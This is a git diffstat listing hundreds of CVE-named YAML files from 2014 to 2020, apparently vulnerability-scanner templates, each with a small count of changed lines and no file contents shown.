http/cves/2014/CVE-2014-9606.yaml | 2 +- http/cves/2014/CVE-2014-9607.yaml | 2 +- http/cves/2014/CVE-2014-9608.yaml | 2 +- http/cves/2014/CVE-2014-9609.yaml | 2 +- http/cves/2014/CVE-2014-9614.yaml | 2 +- http/cves/2014/CVE-2014-9615.yaml | 2 +- http/cves/2014/CVE-2014-9617.yaml | 2 +- http/cves/2014/CVE-2014-9618.yaml | 2 +- http/cves/2015/CVE-2015-0554.yaml | 2 +- http/cves/2015/CVE-2015-1000005.yaml | 2 +- http/cves/2015/CVE-2015-1000010.yaml | 2 +- http/cves/2015/CVE-2015-1000012.yaml | 2 +- http/cves/2015/CVE-2015-1427.yaml | 2 +- http/cves/2015/CVE-2015-1503.yaml | 2 +- http/cves/2015/CVE-2015-1579.yaml | 2 +- http/cves/2015/CVE-2015-1880.yaml | 2 +- http/cves/2015/CVE-2015-2067.yaml | 2 +- http/cves/2015/CVE-2015-2068.yaml | 2 +- http/cves/2015/CVE-2015-2080.yaml | 2 +- http/cves/2015/CVE-2015-2166.yaml | 2 +- http/cves/2015/CVE-2015-2196.yaml | 2 +- http/cves/2015/CVE-2015-2755.yaml | 2 +- http/cves/2015/CVE-2015-2807.yaml | 2 +- http/cves/2015/CVE-2015-2863.yaml | 2 +- http/cves/2015/CVE-2015-2996.yaml | 2 +- http/cves/2015/CVE-2015-3035.yaml | 2 +- http/cves/2015/CVE-2015-3224.yaml | 2 +- http/cves/2015/CVE-2015-3337.yaml | 2 +- http/cves/2015/CVE-2015-3648.yaml | 2 +- http/cves/2015/CVE-2015-3897.yaml | 2 +- http/cves/2015/CVE-2015-4050.yaml | 2 +- http/cves/2015/CVE-2015-4062.yaml | 2 +- http/cves/2015/CVE-2015-4063.yaml | 2 +- http/cves/2015/CVE-2015-4074.yaml | 2 +- http/cves/2015/CVE-2015-4127.yaml | 2 +- http/cves/2015/CVE-2015-4414.yaml | 2 +- http/cves/2015/CVE-2015-4632.yaml | 2 +- http/cves/2015/CVE-2015-4666.yaml | 2 +- http/cves/2015/CVE-2015-4668.yaml | 2 +- http/cves/2015/CVE-2015-4694.yaml | 2 +- http/cves/2015/CVE-2015-5354.yaml | 2 +- http/cves/2015/CVE-2015-5461.yaml | 2 +- http/cves/2015/CVE-2015-5469.yaml | 2 +- http/cves/2015/CVE-2015-5471.yaml | 2 +- http/cves/2015/CVE-2015-5531.yaml | 2 +- http/cves/2015/CVE-2015-5688.yaml | 2 +- http/cves/2015/CVE-2015-6477.yaml | 2 +- http/cves/2015/CVE-2015-6544.yaml | 2 +- http/cves/2015/CVE-2015-6920.yaml | 2 +- http/cves/2015/CVE-2015-7245.yaml | 2 +- http/cves/2015/CVE-2015-7377.yaml | 2 +- http/cves/2015/CVE-2015-7450.yaml | 2 +- http/cves/2015/CVE-2015-7780.yaml | 2 +- http/cves/2015/CVE-2015-7823.yaml | 2 +- http/cves/2015/CVE-2015-8349.yaml | 2 +- http/cves/2015/CVE-2015-8813.yaml | 2 +- http/cves/2015/CVE-2015-9312.yaml | 2 +- http/cves/2015/CVE-2015-9323.yaml | 2 +- http/cves/2015/CVE-2015-9414.yaml | 2 +- http/cves/2015/CVE-2015-9480.yaml | 2 +- http/cves/2016/CVE-2016-0957.yaml | 2 +- http/cves/2016/CVE-2016-1000126.yaml | 2 +- http/cves/2016/CVE-2016-1000127.yaml | 2 +- http/cves/2016/CVE-2016-1000128.yaml | 2 +- http/cves/2016/CVE-2016-1000129.yaml | 2 +- http/cves/2016/CVE-2016-1000130.yaml | 2 +- http/cves/2016/CVE-2016-1000131.yaml | 2 +- http/cves/2016/CVE-2016-1000132.yaml | 2 +- http/cves/2016/CVE-2016-1000133.yaml | 2 +- http/cves/2016/CVE-2016-1000134.yaml | 2 +- http/cves/2016/CVE-2016-1000135.yaml | 2 +- http/cves/2016/CVE-2016-1000136.yaml | 2 +- http/cves/2016/CVE-2016-1000137.yaml | 2 +- http/cves/2016/CVE-2016-1000138.yaml | 2 +- http/cves/2016/CVE-2016-1000139.yaml | 2 +- http/cves/2016/CVE-2016-1000140.yaml | 2 +- http/cves/2016/CVE-2016-1000141.yaml | 2 +- http/cves/2016/CVE-2016-1000142.yaml | 2 +- http/cves/2016/CVE-2016-1000143.yaml | 2 +- http/cves/2016/CVE-2016-1000146.yaml | 2 +- http/cves/2016/CVE-2016-1000148.yaml | 2 +- http/cves/2016/CVE-2016-1000149.yaml | 2 +- http/cves/2016/CVE-2016-1000152.yaml | 2 +- http/cves/2016/CVE-2016-1000153.yaml | 2 +- http/cves/2016/CVE-2016-1000154.yaml | 2 +- http/cves/2016/CVE-2016-1000155.yaml | 2 +- http/cves/2016/CVE-2016-10033.yaml | 2 +- http/cves/2016/CVE-2016-10108.yaml | 2 +- http/cves/2016/CVE-2016-10134.yaml | 2 +- http/cves/2016/CVE-2016-10367.yaml | 2 +- http/cves/2016/CVE-2016-10368.yaml | 2 +- http/cves/2016/CVE-2016-10924.yaml | 2 +- http/cves/2016/CVE-2016-10940.yaml | 2 +- http/cves/2016/CVE-2016-10956.yaml | 2 +- http/cves/2016/CVE-2016-10960.yaml | 2 +- http/cves/2016/CVE-2016-10973.yaml | 2 +- http/cves/2016/CVE-2016-10993.yaml | 2 +- http/cves/2016/CVE-2016-1555.yaml | 2 +- http/cves/2016/CVE-2016-2389.yaml | 2 +- http/cves/2016/CVE-2016-3088.yaml | 2 +- http/cves/2016/CVE-2016-3978.yaml | 2 +- http/cves/2016/CVE-2016-4437.yaml | 2 +- http/cves/2016/CVE-2016-4975.yaml | 2 +- http/cves/2016/CVE-2016-4977.yaml | 2 +- http/cves/2016/CVE-2016-5649.yaml | 7 ++++--- http/cves/2016/CVE-2016-6195.yaml | 2 +- http/cves/2016/CVE-2016-6277.yaml | 2 +- http/cves/2016/CVE-2016-7834.yaml | 2 +- http/cves/2016/CVE-2016-7981.yaml | 2 +- http/cves/2016/CVE-2016-8527.yaml | 2 +- http/cves/2017/CVE-2017-0929.yaml | 2 +- http/cves/2017/CVE-2017-1000029.yaml | 2 +- http/cves/2017/CVE-2017-1000163.yaml | 2 +- http/cves/2017/CVE-2017-1000170.yaml | 2 +- http/cves/2017/CVE-2017-1000486.yaml | 2 +- http/cves/2017/CVE-2017-10075.yaml | 2 +- http/cves/2017/CVE-2017-10974.yaml | 2 +- http/cves/2017/CVE-2017-11165.yaml | 2 +- http/cves/2017/CVE-2017-11444.yaml | 2 +- http/cves/2017/CVE-2017-11512.yaml | 2 +- http/cves/2017/CVE-2017-11586.yaml | 2 +- http/cves/2017/CVE-2017-11629.yaml | 2 +- http/cves/2017/CVE-2017-12138.yaml | 2 +- http/cves/2017/CVE-2017-12542.yaml | 2 +- http/cves/2017/CVE-2017-12544.yaml | 2 +- http/cves/2017/CVE-2017-12583.yaml | 2 +- http/cves/2017/CVE-2017-12615.yaml | 2 +- http/cves/2017/CVE-2017-12617.yaml | 2 +- http/cves/2017/CVE-2017-12637.yaml | 2 +- http/cves/2017/CVE-2017-12794.yaml | 2 +- http/cves/2017/CVE-2017-14135.yaml | 2 +- http/cves/2017/CVE-2017-14186.yaml | 2 +- http/cves/2017/CVE-2017-14524.yaml | 2 +- http/cves/2017/CVE-2017-14535.yaml | 2 +- http/cves/2017/CVE-2017-14537.yaml | 2 +- http/cves/2017/CVE-2017-14622.yaml | 2 +- http/cves/2017/CVE-2017-14651.yaml | 2 +- http/cves/2017/CVE-2017-14849.yaml | 2 +- http/cves/2017/CVE-2017-15287.yaml | 2 +- http/cves/2017/CVE-2017-15363.yaml | 2 +- http/cves/2017/CVE-2017-15647.yaml | 2 +- http/cves/2017/CVE-2017-15715.yaml | 2 +- http/cves/2017/CVE-2017-16806.yaml | 2 +- http/cves/2017/CVE-2017-16877.yaml | 2 +- http/cves/2017/CVE-2017-16894.yaml | 2 +- http/cves/2017/CVE-2017-17043.yaml | 2 +- http/cves/2017/CVE-2017-17059.yaml | 2 +- http/cves/2017/CVE-2017-17451.yaml | 2 +- http/cves/2017/CVE-2017-17731.yaml | 2 +- http/cves/2017/CVE-2017-17736.yaml | 2 +- http/cves/2017/CVE-2017-18024.yaml | 2 +- http/cves/2017/CVE-2017-18487.yaml | 2 +- http/cves/2017/CVE-2017-18490.yaml | 2 +- http/cves/2017/CVE-2017-18491.yaml | 2 +- http/cves/2017/CVE-2017-18492.yaml | 2 +- http/cves/2017/CVE-2017-18493.yaml | 2 +- http/cves/2017/CVE-2017-18494.yaml | 2 +- http/cves/2017/CVE-2017-18496.yaml | 2 +- http/cves/2017/CVE-2017-18500.yaml | 2 +- http/cves/2017/CVE-2017-18501.yaml | 2 +- http/cves/2017/CVE-2017-18502.yaml | 2 +- http/cves/2017/CVE-2017-18505.yaml | 2 +- http/cves/2017/CVE-2017-18516.yaml | 2 +- http/cves/2017/CVE-2017-18517.yaml | 2 +- http/cves/2017/CVE-2017-18518.yaml | 2 +- http/cves/2017/CVE-2017-18527.yaml | 2 +- http/cves/2017/CVE-2017-18528.yaml | 2 +- http/cves/2017/CVE-2017-18529.yaml | 2 +- http/cves/2017/CVE-2017-18530.yaml | 2 +- http/cves/2017/CVE-2017-18532.yaml | 2 +- http/cves/2017/CVE-2017-18536.yaml | 2 +- http/cves/2017/CVE-2017-18537.yaml | 2 +- http/cves/2017/CVE-2017-18542.yaml | 2 +- http/cves/2017/CVE-2017-18556.yaml | 2 +- http/cves/2017/CVE-2017-18557.yaml | 2 +- http/cves/2017/CVE-2017-18558.yaml | 2 +- http/cves/2017/CVE-2017-18562.yaml | 2 +- http/cves/2017/CVE-2017-18564.yaml | 2 +- http/cves/2017/CVE-2017-18565.yaml | 2 +- http/cves/2017/CVE-2017-18566.yaml | 2 +- http/cves/2017/CVE-2017-18598.yaml | 2 +- http/cves/2017/CVE-2017-18638.yaml | 2 +- http/cves/2017/CVE-2017-3506.yaml | 2 +- http/cves/2017/CVE-2017-3528.yaml | 2 +- http/cves/2017/CVE-2017-4011.yaml | 2 +- http/cves/2017/CVE-2017-5521.yaml | 2 +- http/cves/2017/CVE-2017-5631.yaml | 2 +- http/cves/2017/CVE-2017-5982.yaml | 2 +- http/cves/2017/CVE-2017-7269.yaml | 2 +- http/cves/2017/CVE-2017-7391.yaml | 2 +- http/cves/2017/CVE-2017-7615.yaml | 2 +- http/cves/2017/CVE-2017-7921.yaml | 2 +- http/cves/2017/CVE-2017-7925.yaml | 2 +- http/cves/2017/CVE-2017-8229.yaml | 2 +- http/cves/2017/CVE-2017-9140.yaml | 2 +- http/cves/2017/CVE-2017-9288.yaml | 2 +- http/cves/2017/CVE-2017-9416.yaml | 2 +- http/cves/2017/CVE-2017-9506.yaml | 2 +- http/cves/2017/CVE-2017-9822.yaml | 2 +- http/cves/2017/CVE-2017-9833.yaml | 2 +- http/cves/2017/CVE-2017-9841.yaml | 2 +- http/cves/2018/CVE-2018-0127.yaml | 2 +- http/cves/2018/CVE-2018-0296.yaml | 2 +- http/cves/2018/CVE-2018-1000129.yaml | 2 +- http/cves/2018/CVE-2018-1000130.yaml | 2 +- http/cves/2018/CVE-2018-1000226.yaml | 2 +- http/cves/2018/CVE-2018-1000600.yaml | 2 +- http/cves/2018/CVE-2018-1000671.yaml | 2 +- http/cves/2018/CVE-2018-1000856.yaml | 2 +- http/cves/2018/CVE-2018-1000861.yaml | 2 +- http/cves/2018/CVE-2018-10093.yaml | 2 +- http/cves/2018/CVE-2018-10141.yaml | 2 +- http/cves/2018/CVE-2018-10201.yaml | 2 +- http/cves/2018/CVE-2018-10230.yaml | 2 +- http/cves/2018/CVE-2018-10562.yaml | 2 +- http/cves/2018/CVE-2018-10822.yaml | 2 +- http/cves/2018/CVE-2018-10956.yaml | 2 +- http/cves/2018/CVE-2018-11227.yaml | 2 +- http/cves/2018/CVE-2018-11231.yaml | 2 +- http/cves/2018/CVE-2018-11473.yaml | 2 +- http/cves/2018/CVE-2018-11709.yaml | 2 +- http/cves/2018/CVE-2018-11784.yaml | 4 ++-- http/cves/2018/CVE-2018-12031.yaml | 2 +- http/cves/2018/CVE-2018-12054.yaml | 2 +- http/cves/2018/CVE-2018-1207.yaml | 2 +- http/cves/2018/CVE-2018-12095.yaml | 4 ++-- http/cves/2018/CVE-2018-12296.yaml | 2 +- http/cves/2018/CVE-2018-12300.yaml | 2 +- http/cves/2018/CVE-2018-12675.yaml | 2 +- http/cves/2018/CVE-2018-1271.yaml | 2 +- http/cves/2018/CVE-2018-1273.yaml | 2 +- http/cves/2018/CVE-2018-12909.yaml | 2 +- http/cves/2018/CVE-2018-12998.yaml | 2 +- http/cves/2018/CVE-2018-13380.yaml | 2 +- http/cves/2018/CVE-2018-13980.yaml | 2 +- http/cves/2018/CVE-2018-14013.yaml | 2 +- http/cves/2018/CVE-2018-14064.yaml | 2 +- http/cves/2018/CVE-2018-14474.yaml | 2 +- http/cves/2018/CVE-2018-14574.yaml | 2 +- http/cves/2018/CVE-2018-14912.yaml | 2 +- http/cves/2018/CVE-2018-14916.yaml | 2 +- http/cves/2018/CVE-2018-14918.yaml | 2 +- http/cves/2018/CVE-2018-14931.yaml | 2 +- http/cves/2018/CVE-2018-15138.yaml | 2 +- http/cves/2018/CVE-2018-15517.yaml | 2 +- http/cves/2018/CVE-2018-15745.yaml | 2 +- http/cves/2018/CVE-2018-15917.yaml | 2 +- http/cves/2018/CVE-2018-16059.yaml | 2 +- http/cves/2018/CVE-2018-16133.yaml | 2 +- http/cves/2018/CVE-2018-16139.yaml | 2 +- http/cves/2018/CVE-2018-16159.yaml | 2 +- http/cves/2018/CVE-2018-16167.yaml | 2 +- http/cves/2018/CVE-2018-16283.yaml | 2 +- http/cves/2018/CVE-2018-16299.yaml | 2 +- http/cves/2018/CVE-2018-16668.yaml | 2 +- http/cves/2018/CVE-2018-16670.yaml | 2 +- http/cves/2018/CVE-2018-16671.yaml | 2 +- http/cves/2018/CVE-2018-16716.yaml | 2 +- http/cves/2018/CVE-2018-16761.yaml | 2 +- http/cves/2018/CVE-2018-16763.yaml | 2 +- http/cves/2018/CVE-2018-16836.yaml | 2 +- http/cves/2018/CVE-2018-16979.yaml | 2 +- http/cves/2018/CVE-2018-17153.yaml | 2 +- http/cves/2018/CVE-2018-17246.yaml | 2 +- http/cves/2018/CVE-2018-17254.yaml | 2 +- http/cves/2018/CVE-2018-17422.yaml | 2 +- http/cves/2018/CVE-2018-17431.yaml | 2 +- http/cves/2018/CVE-2018-18069.yaml | 2 +- http/cves/2018/CVE-2018-18264.yaml | 2 +- http/cves/2018/CVE-2018-18323.yaml | 2 +- http/cves/2018/CVE-2018-18570.yaml | 2 +- http/cves/2018/CVE-2018-18608.yaml | 2 +- http/cves/2018/CVE-2018-18775.yaml | 2 +- http/cves/2018/CVE-2018-18777.yaml | 2 +- http/cves/2018/CVE-2018-18809.yaml | 2 +- http/cves/2018/CVE-2018-18925.yaml | 2 +- http/cves/2018/CVE-2018-19136.yaml | 2 +- http/cves/2018/CVE-2018-19137.yaml | 2 +- http/cves/2018/CVE-2018-19287.yaml | 2 +- http/cves/2018/CVE-2018-19326.yaml | 2 +- http/cves/2018/CVE-2018-19365.yaml | 2 +- http/cves/2018/CVE-2018-19386.yaml | 2 +- http/cves/2018/CVE-2018-19439.yaml | 2 +- http/cves/2018/CVE-2018-19458.yaml | 2 +- http/cves/2018/CVE-2018-19749.yaml | 2 +- http/cves/2018/CVE-2018-19751.yaml | 2 +- http/cves/2018/CVE-2018-19752.yaml | 2 +- http/cves/2018/CVE-2018-19753.yaml | 2 +- http/cves/2018/CVE-2018-19877.yaml | 2 +- http/cves/2018/CVE-2018-19892.yaml | 2 +- http/cves/2018/CVE-2018-19914.yaml | 2 +- http/cves/2018/CVE-2018-19915.yaml | 2 +- http/cves/2018/CVE-2018-20009.yaml | 2 +- http/cves/2018/CVE-2018-20010.yaml | 2 +- http/cves/2018/CVE-2018-20011.yaml | 2 +- http/cves/2018/CVE-2018-20462.yaml | 2 +- http/cves/2018/CVE-2018-20463.yaml | 2 +- http/cves/2018/CVE-2018-20470.yaml | 2 +- http/cves/2018/CVE-2018-20526.yaml | 2 +- http/cves/2018/CVE-2018-20608.yaml | 2 +- http/cves/2018/CVE-2018-20824.yaml | 2 +- http/cves/2018/CVE-2018-20985.yaml | 2 +- http/cves/2018/CVE-2018-2392.yaml | 2 +- http/cves/2018/CVE-2018-2791.yaml | 2 +- http/cves/2018/CVE-2018-3167.yaml | 2 +- http/cves/2018/CVE-2018-3238.yaml | 2 +- http/cves/2018/CVE-2018-3714.yaml | 2 +- http/cves/2018/CVE-2018-3760.yaml | 2 +- http/cves/2018/CVE-2018-3810.yaml | 2 +- http/cves/2018/CVE-2018-5230.yaml | 2 +- http/cves/2018/CVE-2018-5233.yaml | 2 +- http/cves/2018/CVE-2018-5316.yaml | 2 +- http/cves/2018/CVE-2018-5715.yaml | 2 +- http/cves/2018/CVE-2018-6008.yaml | 2 +- http/cves/2018/CVE-2018-6184.yaml | 2 +- http/cves/2018/CVE-2018-6200.yaml | 2 +- http/cves/2018/CVE-2018-6530.yaml | 2 +- http/cves/2018/CVE-2018-6910.yaml | 2 +- http/cves/2018/CVE-2018-7251.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 2 +- http/cves/2018/CVE-2018-7422.yaml | 2 +- http/cves/2018/CVE-2018-7467.yaml | 2 +- http/cves/2018/CVE-2018-7602.yaml | 2 +- http/cves/2018/CVE-2018-7653.yaml | 2 +- http/cves/2018/CVE-2018-7662.yaml | 2 +- http/cves/2018/CVE-2018-7700.yaml | 2 +- http/cves/2018/CVE-2018-7719.yaml | 2 +- http/cves/2018/CVE-2018-8033.yaml | 2 +- http/cves/2018/CVE-2018-8715.yaml | 2 +- http/cves/2018/CVE-2018-8719.yaml | 2 +- http/cves/2018/CVE-2018-8727.yaml | 2 +- http/cves/2018/CVE-2018-8770.yaml | 2 +- http/cves/2018/CVE-2018-9118.yaml | 2 +- http/cves/2018/CVE-2018-9161.yaml | 2 +- http/cves/2018/CVE-2018-9205.yaml | 2 +- http/cves/2018/CVE-2018-9845.yaml | 2 +- http/cves/2018/CVE-2018-9995.yaml | 2 +- http/cves/2019/CVE-2019-0193.yaml | 2 +- http/cves/2019/CVE-2019-0221.yaml | 2 +- http/cves/2019/CVE-2019-10068.yaml | 2 +- http/cves/2019/CVE-2019-10092.yaml | 2 +- http/cves/2019/CVE-2019-10098.yaml | 2 +- http/cves/2019/CVE-2019-1010287.yaml | 2 +- http/cves/2019/CVE-2019-1010290.yaml | 2 +- http/cves/2019/CVE-2019-10232.yaml | 2 +- http/cves/2019/CVE-2019-10405.yaml | 2 +- http/cves/2019/CVE-2019-10717.yaml | 2 +- http/cves/2019/CVE-2019-10758.yaml | 2 +- http/cves/2019/CVE-2019-11013.yaml | 2 +- http/cves/2019/CVE-2019-11248.yaml | 5 +++-- http/cves/2019/CVE-2019-11370.yaml | 2 +- http/cves/2019/CVE-2019-11580.yaml | 2 +- http/cves/2019/CVE-2019-11581.yaml | 2 +- http/cves/2019/CVE-2019-11869.yaml | 2 +- http/cves/2019/CVE-2019-12314.yaml | 2 +- http/cves/2019/CVE-2019-12461.yaml | 2 +- http/cves/2019/CVE-2019-12581.yaml | 2 +- http/cves/2019/CVE-2019-12583.yaml | 2 +- http/cves/2019/CVE-2019-12616.yaml | 2 +- http/cves/2019/CVE-2019-12962.yaml | 2 +- http/cves/2019/CVE-2019-12990.yaml | 2 +- http/cves/2019/CVE-2019-13101.yaml | 2 +- http/cves/2019/CVE-2019-13392.yaml | 2 +- http/cves/2019/CVE-2019-13396.yaml | 2 +- http/cves/2019/CVE-2019-13462.yaml | 2 +- http/cves/2019/CVE-2019-14205.yaml | 2 +- http/cves/2019/CVE-2019-14223.yaml | 2 +- http/cves/2019/CVE-2019-14251.yaml | 2 +- http/cves/2019/CVE-2019-14312.yaml | 2 +- http/cves/2019/CVE-2019-14322.yaml | 2 +- http/cves/2019/CVE-2019-14470.yaml | 2 +- http/cves/2019/CVE-2019-14530.yaml | 2 +- http/cves/2019/CVE-2019-14696.yaml | 2 +- http/cves/2019/CVE-2019-14750.yaml | 2 +- http/cves/2019/CVE-2019-14789.yaml | 2 +- http/cves/2019/CVE-2019-14974.yaml | 2 +- http/cves/2019/CVE-2019-15043.yaml | 2 +- http/cves/2019/CVE-2019-15107.yaml | 2 +- http/cves/2019/CVE-2019-15501.yaml | 2 +- http/cves/2019/CVE-2019-15642.yaml | 2 +- http/cves/2019/CVE-2019-15713.yaml | 2 +- http/cves/2019/CVE-2019-15811.yaml | 2 +- http/cves/2019/CVE-2019-15829.yaml | 2 +- http/cves/2019/CVE-2019-15858.yaml | 2 +- http/cves/2019/CVE-2019-15859.yaml | 2 +- http/cves/2019/CVE-2019-15889.yaml | 2 +- http/cves/2019/CVE-2019-16097.yaml | 2 +- http/cves/2019/CVE-2019-16123.yaml | 2 +- http/cves/2019/CVE-2019-16278.yaml | 2 +- http/cves/2019/CVE-2019-16313.yaml | 2 +- http/cves/2019/CVE-2019-16332.yaml | 2 +- http/cves/2019/CVE-2019-16525.yaml | 2 +- http/cves/2019/CVE-2019-16931.yaml | 2 +- http/cves/2019/CVE-2019-16932.yaml | 2 +- http/cves/2019/CVE-2019-16996.yaml | 2 +- http/cves/2019/CVE-2019-16997.yaml | 2 +- http/cves/2019/CVE-2019-17270.yaml | 2 +- http/cves/2019/CVE-2019-17418.yaml | 4 ++-- http/cves/2019/CVE-2019-17444.yaml | 2 +- http/cves/2019/CVE-2019-17503.yaml | 2 +- http/cves/2019/CVE-2019-17506.yaml | 2 +- http/cves/2019/CVE-2019-17538.yaml | 2 +- http/cves/2019/CVE-2019-17574.yaml | 2 +- http/cves/2019/CVE-2019-17662.yaml | 2 +- http/cves/2019/CVE-2019-1821.yaml | 2 +- http/cves/2019/CVE-2019-18371.yaml | 2 +- http/cves/2019/CVE-2019-18393.yaml | 2 +- http/cves/2019/CVE-2019-18394.yaml | 2 +- http/cves/2019/CVE-2019-18665.yaml | 2 +- http/cves/2019/CVE-2019-18818.yaml | 2 +- http/cves/2019/CVE-2019-18922.yaml | 2 +- http/cves/2019/CVE-2019-18957.yaml | 2 +- http/cves/2019/CVE-2019-1898.yaml | 2 +- http/cves/2019/CVE-2019-19134.yaml | 2 +- http/cves/2019/CVE-2019-19368.yaml | 2 +- http/cves/2019/CVE-2019-1943.yaml | 2 +- http/cves/2019/CVE-2019-19908.yaml | 2 +- http/cves/2019/CVE-2019-19985.yaml | 2 +- http/cves/2019/CVE-2019-20085.yaml | 2 +- http/cves/2019/CVE-2019-20141.yaml | 2 +- http/cves/2019/CVE-2019-20183.yaml | 2 +- http/cves/2019/CVE-2019-20210.yaml | 2 +- http/cves/2019/CVE-2019-20224.yaml | 2 +- http/cves/2019/CVE-2019-20933.yaml | 2 +- http/cves/2019/CVE-2019-2578.yaml | 2 +- http/cves/2019/CVE-2019-2579.yaml | 2 +- http/cves/2019/CVE-2019-2588.yaml | 2 +- http/cves/2019/CVE-2019-2729.yaml | 2 +- http/cves/2019/CVE-2019-3401.yaml | 2 +- http/cves/2019/CVE-2019-3402.yaml | 2 +- http/cves/2019/CVE-2019-3403.yaml | 2 +- http/cves/2019/CVE-2019-3799.yaml | 4 ++-- http/cves/2019/CVE-2019-3911.yaml | 2 +- http/cves/2019/CVE-2019-3912.yaml | 2 +- http/cves/2019/CVE-2019-3929.yaml | 5 +++-- http/cves/2019/CVE-2019-5434.yaml | 2 +- http/cves/2019/CVE-2019-6112.yaml | 2 +- http/cves/2019/CVE-2019-6340.yaml | 2 +- http/cves/2019/CVE-2019-6715.yaml | 2 +- http/cves/2019/CVE-2019-6799.yaml | 2 +- http/cves/2019/CVE-2019-6802.yaml | 2 +- http/cves/2019/CVE-2019-7192.yaml | 2 +- http/cves/2019/CVE-2019-7219.yaml | 2 +- http/cves/2019/CVE-2019-7238.yaml | 2 +- http/cves/2019/CVE-2019-7254.yaml | 2 +- http/cves/2019/CVE-2019-7255.yaml | 2 +- http/cves/2019/CVE-2019-7275.yaml | 2 +- http/cves/2019/CVE-2019-7315.yaml | 2 +- http/cves/2019/CVE-2019-7481.yaml | 2 +- http/cves/2019/CVE-2019-7543.yaml | 2 +- http/cves/2019/CVE-2019-7609.yaml | 2 +- http/cves/2019/CVE-2019-8086.yaml | 2 +- http/cves/2019/CVE-2019-8390.yaml | 2 +- http/cves/2019/CVE-2019-8442.yaml | 2 +- http/cves/2019/CVE-2019-8446.yaml | 2 +- http/cves/2019/CVE-2019-8449.yaml | 2 +- http/cves/2019/CVE-2019-8903.yaml | 2 +- http/cves/2019/CVE-2019-8937.yaml | 2 +- http/cves/2019/CVE-2019-8982.yaml | 2 +- http/cves/2019/CVE-2019-9041.yaml | 2 +- http/cves/2019/CVE-2019-9618.yaml | 2 +- http/cves/2019/CVE-2019-9726.yaml | 2 +- http/cves/2019/CVE-2019-9733.yaml | 2 +- http/cves/2019/CVE-2019-9915.yaml | 2 +- http/cves/2019/CVE-2019-9922.yaml | 2 +- http/cves/2019/CVE-2019-9955.yaml | 2 +- http/cves/2020/CVE-2020-10148.yaml | 3 ++- http/cves/2020/CVE-2020-10199.yaml | 2 +- http/cves/2020/CVE-2020-10220.yaml | 2 +- http/cves/2020/CVE-2020-10546.yaml | 2 +- http/cves/2020/CVE-2020-10547.yaml | 2 +- http/cves/2020/CVE-2020-10548.yaml | 2 +- http/cves/2020/CVE-2020-10549.yaml | 2 +- http/cves/2020/CVE-2020-10770.yaml | 2 +- http/cves/2020/CVE-2020-10973.yaml | 2 +- http/cves/2020/CVE-2020-11034.yaml | 2 +- http/cves/2020/CVE-2020-11110.yaml | 2 +- http/cves/2020/CVE-2020-11450.yaml | 2 +- http/cves/2020/CVE-2020-11455.yaml | 2 +- http/cves/2020/CVE-2020-11529.yaml | 2 +- http/cves/2020/CVE-2020-11530.yaml | 2 +- http/cves/2020/CVE-2020-11547.yaml | 2 +- http/cves/2020/CVE-2020-11710.yaml | 2 +- http/cves/2020/CVE-2020-11798.yaml | 2 +- http/cves/2020/CVE-2020-11853.yaml | 2 +- http/cves/2020/CVE-2020-11854.yaml | 2 +- http/cves/2020/CVE-2020-11930.yaml | 2 +- http/cves/2020/CVE-2020-11991.yaml | 2 +- http/cves/2020/CVE-2020-12054.yaml | 2 +- http/cves/2020/CVE-2020-12127.yaml | 2 +- http/cves/2020/CVE-2020-12256.yaml | 2 +- http/cves/2020/CVE-2020-12447.yaml | 2 +- http/cves/2020/CVE-2020-12478.yaml | 2 +- http/cves/2020/CVE-2020-12720.yaml | 2 +- http/cves/2020/CVE-2020-13117.yaml | 2 +- http/cves/2020/CVE-2020-13121.yaml | 2 +- http/cves/2020/CVE-2020-13158.yaml | 2 +- http/cves/2020/CVE-2020-13258.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 2 +- http/cves/2020/CVE-2020-13405.yaml | 2 +- http/cves/2020/CVE-2020-13483.yaml | 2 +- http/cves/2020/CVE-2020-13638.yaml | 4 ++-- http/cves/2020/CVE-2020-13700.yaml | 2 +- http/cves/2020/CVE-2020-13820.yaml | 2 +- http/cves/2020/CVE-2020-13851.yaml | 2 +- http/cves/2020/CVE-2020-13937.yaml | 2 +- http/cves/2020/CVE-2020-13942.yaml | 3 ++- http/cves/2020/CVE-2020-13945.yaml | 2 +- http/cves/2020/CVE-2020-14092.yaml | 2 +- http/cves/2020/CVE-2020-14144.yaml | 2 +- http/cves/2020/CVE-2020-14179.yaml | 2 +- http/cves/2020/CVE-2020-14181.yaml | 2 +- http/cves/2020/CVE-2020-14408.yaml | 2 +- http/cves/2020/CVE-2020-14413.yaml | 2 +- http/cves/2020/CVE-2020-14864.yaml | 2 +- http/cves/2020/CVE-2020-15050.yaml | 2 +- http/cves/2020/CVE-2020-15129.yaml | 2 +- http/cves/2020/CVE-2020-15148.yaml | 2 +- http/cves/2020/CVE-2020-15500.yaml | 2 +- http/cves/2020/CVE-2020-15505.yaml | 2 +- http/cves/2020/CVE-2020-15867.yaml | 2 +- http/cves/2020/CVE-2020-15895.yaml | 2 +- http/cves/2020/CVE-2020-16139.yaml | 2 +- http/cves/2020/CVE-2020-16952.yaml | 2 +- http/cves/2020/CVE-2020-17362.yaml | 2 +- http/cves/2020/CVE-2020-17453.yaml | 2 +- http/cves/2020/CVE-2020-17456.yaml | 2 +- http/cves/2020/CVE-2020-17463.yaml | 2 +- http/cves/2020/CVE-2020-17505.yaml | 2 +- http/cves/2020/CVE-2020-17506.yaml | 2 +- http/cves/2020/CVE-2020-17518.yaml | 2 +- http/cves/2020/CVE-2020-17526.yaml | 2 +- http/cves/2020/CVE-2020-17530.yaml | 4 ++-- http/cves/2020/CVE-2020-18268.yaml | 2 +- http/cves/2020/CVE-2020-19282.yaml | 2 +- http/cves/2020/CVE-2020-19283.yaml | 2 +- http/cves/2020/CVE-2020-19295.yaml | 2 +- http/cves/2020/CVE-2020-19360.yaml | 2 +- http/cves/2020/CVE-2020-19515.yaml | 2 +- http/cves/2020/CVE-2020-1956.yaml | 2 +- http/cves/2020/CVE-2020-19625.yaml | 2 +- http/cves/2020/CVE-2020-20285.yaml | 2 +- http/cves/2020/CVE-2020-20300.yaml | 2 +- http/cves/2020/CVE-2020-2036.yaml | 2 +- http/cves/2020/CVE-2020-20982.yaml | 2 +- http/cves/2020/CVE-2020-20988.yaml | 2 +- http/cves/2020/CVE-2020-21012.yaml | 2 +- http/cves/2020/CVE-2020-2103.yaml | 2 +- http/cves/2020/CVE-2020-21224.yaml | 2 +- http/cves/2020/CVE-2020-2140.yaml | 2 +- http/cves/2020/CVE-2020-22208.yaml | 4 ++-- http/cves/2020/CVE-2020-22209.yaml | 4 ++-- http/cves/2020/CVE-2020-22210.yaml | 4 ++-- 